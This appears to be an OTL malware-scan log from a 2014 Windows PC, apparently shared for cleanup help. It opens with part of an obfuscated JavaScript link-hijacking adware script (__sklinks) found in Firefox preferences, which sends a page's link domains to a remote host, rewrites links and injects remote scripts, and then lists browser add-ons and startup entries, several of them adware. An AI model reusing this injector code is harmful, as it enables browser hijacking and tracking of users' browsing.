a=\"\",e=0,d=c1=c2=0;e<b.length;)d=b.charCodeAt(e),128>d?(a+=String.fromCharCode(d),e++):191<d&&224>d?(c2=b.charCodeAt(e+1),a+=String.fromCharCode((d&31)<<6|c2&63),e+=2):(c2=b.charCodeAt(e+1),c3=b.charCodeAt(e+2), a+=String.fromCharCode((d&15)<<12|(c2&63)<<6|c3&63),e+=3);return a}};this.checkHostnameInArray=function(b,a){for(var f=0;f<a.length;f++)if(a[f].hostname==b)return!1;return!0};this.injectScript=function(a){var c=document.createElement(\"script\");c.id=\"__skl_script\";c.src=a;c.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild©};this.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}}; a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,f,e,d,g){\"undefined\"==typeof d&&(d=window);d.addEventListener(c,f,e);g&&a.cache.push([c,f,e,d])}:window.attachEvent?function(c,f,e,d,g){\"undefined\"==typeof d&&(d=window);d[\"e\"+c+f]=f;d[c+f]=function(){d[\"e\"+c+f](window.event)};d.attachEvent(\"on\"+c,d[c+f]);g&&a.cache.push([c,f,e,d])}:function(){};a.remove=window.removeEventListener?function(a,b,e,d){\"undefined\"==typeof d&&(d=window);d.removeEventListener(a,b,e)}: window.detachEvent?function(a,b,e,d){\"undefined\"==typeof d&&(d=window);d.detachEvent(\"on\"+a,d[a+b]);d[a+b]=null;d[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};a.randomLetters=function(){for(var a=\"\",c=0;3>c;c++)a+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\".charAt(Math.floor(62*Math.random()));return a};a.getLinks=function(){a.allLinks=document.links;a.validOutput=[];var b=[];a.domains={};for(var c=0;c< a.allLinks.length;c++){var f=a.allLinks[c].hostname;f!==location.hostname&&\"\"!==a.allLinks[c].hostname&&(\"undefined\"==typeof a.domains[f]&&a.validOutput.push(a.allLinks[c]),b.push(f.replace(/www./,\"\")))}for(var e in a.domains)e=e.replace(/www./,\"\"),b.push(e);return b.toString()};a.storage=new function(){var b=this;b.valid=localStorage;b.set=function(c,f){b.valid&&localStorage.setItem(a.prefix+\"_\"+c,f)};b.get=function©{return b.valid?localStorage.getItem(a.prefix+\"_\"+c):!1};b.clear=function(){b.valid&& localStorage.clear()};b.remove=function©{b.valid&&localStorage.removeItem(a.prefix+c)}};a.handleGooLinks=function(b,c,f,e,d){var g=b.href;b.href=\"#\";b.setAttribute(\"data-yodat\",c);b.setAttribute(\"onmousedown\",\"\");a.events.add(\"click\",function(b){b=a.utils.base64.encode(g);b=a.randomLetters()+b+a.randomLetters();var c=this.getAttribute(\"data-yodat\");a.storage.set(c,a.now+a.interval);\"A\"==this.nodeName&&(location.href=\"//\"+a.hostname+\"?rd=\"+encodeURIComponent(a.utils.decodeHtml(e))+b+a.path+\"&fid=\"+ d) },!1,b,!1)};a.validInterval=function(b){b=a.storage.get(b);return null===b?!0:b?a.now>parseInt(b):!1};a.dcrypt=function(b){for(var c=[],f=0;f<b.length;f++){var e=b[f],e=e.substring(3),e=e.substring(0,e.length-3),e=a.utils.base64.decode(e);c.push(e)}return c};a.handleLinks=function(b){if(\"undefined\"==typeof a.validOutput||a.validOutput.length!==b.length)return!1;for(var c=0;c<a.validOutput.length;c++){var f=a.validOutput[c],e=b[c].split(\"^\")[1],d=b[c].split(\"^\")[0],g=f.hostname.replace(/www./,\"\"); if (5<d.length&&a.validInterval(g))if(a.google)a.handleGooLinks(f,g,b,d,e);else{var h=a.utils.base64.encode(f.href),h=a.randomLetters()+h+a.randomLetters();f.setAttribute(\"data-yodat\",g);f.setAttribute(\"data-yodatfid\",e);f.href=\"//\"+a.hostname+\"?rd=\"+encodeURIComponent(a.utils.decodeHtml(d))+h+a.path+\"&fid=\"+e;a.events.add(\"click\",function(b){if(\"A\"!==this.nodeName)return!1;b=this.getAttribute(\"data-yodat\");this.getAttribute(\"data-yodatfid\");if(!b)return!1;a.storage.set(b,a.now+a.interval)},!1,f,!1)}}}; a.isGoo=function(b){null===location.hostname.match(/www\\.google\\.[a-z,\\.]+$/)?(a.google=!1,b()):(a.count=0,a.check_tab=function(){var c=document.getElementById(\"hdtb_msb\");if(null==c||\"undefined\"==typeof c)a.count++,10>a.count?setTimeout(function(){a.check_tab()},1E3):(a.google=!1,b());else return a.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(a.google=!0,b()),!1},a.check_tab())};a.handleGoogle=function(){a.google=!0;var b;a:{b=[\"#gbqfq\",'input[name=\"q\"]'];for(var c=0;c< b.length;c++)if(1<a.utils.query_selector_all(b[c]).length){b=a.utils.query_selector_all(b[c])[0];break a}b=void 0}a.searchInput=b};a.init=function(){a.linksStr=encodeURIComponent(a.getLinks());if(!a.linksStr)return!1;var b=\"//\"+a.hostname+\"/?domains=\"+a.linksStr+a.path;a.utils.isIE()?a.utils.addScript(b+\"&cb=__sklinks.handleLinks\"):a.utils.ajax.get(b,function(b){try{b=JSON.parse(b),a.response=JSON.parse(b),a.handleLinks(a.response)}catch(f){}})};a.isGoo(function(){a.init();a.google&&(a.handleGoogle(), a.searchInput&&a.events.add(\"keyup\",a.utils.throttle(a.init,3E3),!1,a.searchInput,!1))});\"undefined\"==typeof window.__sklinks&&(window.__sklinks=a)};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - prefs.js..keyword.URL: "http://uk.search.yah...type=903578&p="
FF - user.js - File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2014/05/04 16:54:43 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
[2014/05/06 14:05:31 | 000,000,000 | ---D | M] (No name found) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Extensions
[2014/05/24 14:23:14 | 000,000,000 | ---D | M] (No name found) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Firefox\Profiles\f7t4qr94.default\extensions
[2014/05/24 14:23:14 | 000,000,000 | ---D | M] (ddeaalPeaK) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected]
[2014/05/24 14:23:18 | 000,008,078 | ---- | M] () -- C:\Users\paulj_000\AppData\Roaming\mozilla\firefox\profiles\f7t4qr94.default\searchplugins\yahoo_ff.xml
[2014/06/01 21:48:54 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/06/01 21:48:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
========== Chrome ==========
CHR - default_search_provider: Yahoo (Enabled)
CHR - default_search_provider: search_url = http://uk.search.yah...p={searchTerms}
CHR - default_search_provider: suggest_url = http://ff.search.yah...={searchTerms},
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: avast! Online Security = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2018.95_0\
CHR - Extension: Google Wallet = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
O1 HOSTS File: ([2013/08/22 14:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (ExplorerBHO Class) - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
O2:64bit: - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2:64bit: - BHO: (toopbUyEr) - {DB458257-B25C-8DD6-DBA9-285ED6951694} - C:\ProgramData\toopbUyEr\zcaFkvf.x64.dll ()
O2:64bit: - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
O2:64bit: - BHO: (ClassicIEBHO Class) - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_64.dll (IvoSoft)
O2 - BHO: (ExplorerBHO Class) - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (toopbUyEr) - {DB458257-B25C-8DD6-DBA9-285ED6951694} - C:\ProgramData\toopbUyEr\zcaFkvf.dll ()
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O2 - BHO: (ClassicIEBHO Class) - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll (IvoSoft)
O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3:64bit: - HKLM\..\Toolbar: (Classic Explorer Bar) - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
O3 - HKLM\..\Toolbar: (Classic Explorer Bar) - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
O4:64bit: - HKLM..\Run: [Classic Start Menu] C:\Program Files\Classic Shell\ClassicStartMenu.exe (IvoSoft)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [OPBHOBroker] C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe (Hewlett-Packard)
O4:64bit: - HKLM..\Run: [OPBHOBrokerDesktop] C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe (Hewlett-Packard)
O4:[b]64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit: - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4:[b]64bit: - HKLM..\Run: [SimplePass] C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe (Hewlett-Packard)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [HPMessageService] C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.)
O4 - HKLM..\Run: [Internet Helper Anti-phishing] C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe (Internet Helper)
O4 - HKLM..\Run: [YouCam Service] C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe (CyberLink Corp.)
O4 - HKCU..\Run: [SearchProtection] C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.EXE (Spigot, Inc.)
O4 - HKCU..\Run: [uTorrent] C:\Users\paulj_000\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit: - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit: - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit: - Extra 'Tools' menuitem : Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe (IvoSoft)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe (IvoSoft)
O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{21A232F6-C67F-4E3C-9B63-1AE6C41AB7DE}: DhcpNameServer = 192.168.56.3
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5EA2473D-69A1-482B-99A7-0380670FC039}: DhcpNameServer = 192.168.1.1
O18:[b]64bit: - Protocol\Handler\wlpg - No CLSID value found
O20:[b]64bit: - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20:[b]64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
========== Files/Folders - Created Within 30 Days ==========
[2014/06/01 21:48:59 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014/06/01 21:48:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2014/06/01 09:03:13 | 000,000,000 | ---D | C] -- C:\ProgramData\374311380
[2014/06/01 09:03:01 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Programs
[2014/05/24 14:23:07 | 000,000,000 | ---D | C] -- C:\ProgramData\b809a102f4c41187
[2014/05/24 14:22:54 | 000,000,000 | ---D | C] -- C:\ProgramData\toopbUyEr
[2014/05/20 18:17:05 | 000,000,000 | ---D | C] -- C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
[2014/05/11 18:11:17 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\hpqlog
[2014/05/11 18:11:08 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Hewlett-Packard
[2014/05/10 22:35:30 | 000,000,000 | R--D | C] -- C:\Windows\BrowserChoice
[2014/05/10 18:23:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Google
[2014/05/10 08:40:58 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Search Protection
[2014/05/10 08:39:52 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\uTorrent
[2014/05/09 16:52:42 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/05/06 17:06:05 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\ClassicShell
[2014/05/06 17:04:21 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\vlc
[2014/05/06 14:09:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Macromedia
[2014/05/06 14:09:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Macromedia
[2014/05/06 14:05:06 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Mozilla
[2014/05/06 14:05:06 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Mozilla
[2014/05/06 14:04:12 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\SkyDrive
[2014/05/06 14:04:10 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Hewlett-Packard
[2014/05/06 14:01:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\antiphishing-internethelper
[2014/05/06 14:00:30 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\Documents\Youcam
[2014/05/06 14:00:23 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\CyberLink
[2014/05/06 13:59:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\AVAST Software
[2014/05/06 13:56:26 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Power2Go8
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Searches
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[2014/05/06 13:56:17 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Contacts
[2014/05/06 13:56:14 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Synaptics
[2014/05/06 13:56:03 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Adobe
[2014/05/06 13:55:58 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\VirtualStore
[2014/05/06 13:55:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\SearchProtect
[2014/05/06 13:55:50 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Packages
[2014/05/06 13:55:42 | 000,000,000 | --SD | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Videos
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Saved Games
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Pictures
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Music
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Links
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Favorites
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Downloads
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Documents
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Desktop
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\Documents\hp.system.package.metadata
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\Documents\hp.applications.package.appdata
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\AppData
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Temp
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Microsoft
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
[2014/05/04 17:34:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
[2014/05/04 17:32:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VideoLAN
[2014/05/04 17:19:31 | 000,000,000 | ---D | C] -- C:\ProgramData\ClassicShell
[2014/05/04 17:18:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Classic Shell
[2014/05/04 17:18:06 | 000,000,000 | ---D | C] -- C:\Program Files\Classic Shell
[2014/05/04 16:58:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast
[2014/05/04 16:57:42 | 000,000,000 | ---D | C] -- C:\Program Files\Google
[2014/05/04 16:57:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Google
[2014/05/04 16:57:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2014/05/04 16:56:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Google
[2014/05/04 16:55:37 | 000,085,328 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswstm.sys
[2014/05/04 16:55:36 | 001,039,096 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys.1400515085015
[2014/05/04 16:55:36 | 001,039,096 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys
[2014/05/04 16:55:36 | 000,423,240 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys.1400515085015
[2014/05/04 16:55:36 | 000,423,240 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys
[2014/05/04 16:55:36 | 000,093,568 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2014/05/04 16:55:36 | 000,079,184 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2014/05/04 16:55:34 | 000,334,648 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2014/05/04 16:54:16 | 000,043,152 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr
[2014/05/04 16:52:27 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2014/05/04 16:51:38 | 000,000,000 | ---D | C] -- C:\ProgramData\CDB
[2014/05/04 16:51:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
[2014/05/04 16:50:37 | 000,000,000 | ---D | C] -- C:\Program Files\Reimage
[2014/05/04 16:50:15 | 000,000,000 | ---D | C] -- C:\rei
[2014/05/04 16:50:09 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2014/05/04 16:50:05 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoftwareWatcher bundle
[2014/05/04 16:49:55 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2
[2014/05/04 16:49:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Optimizer Pro
[2014/05/04 16:47:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\sweetpacks bundle uninstaller
[2014/05/04 16:45:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Internet Helper Anti-phishing
[2014/05/04 16:45:10 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MyPC Backup
[2014/05/04 16:44:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Mozilla
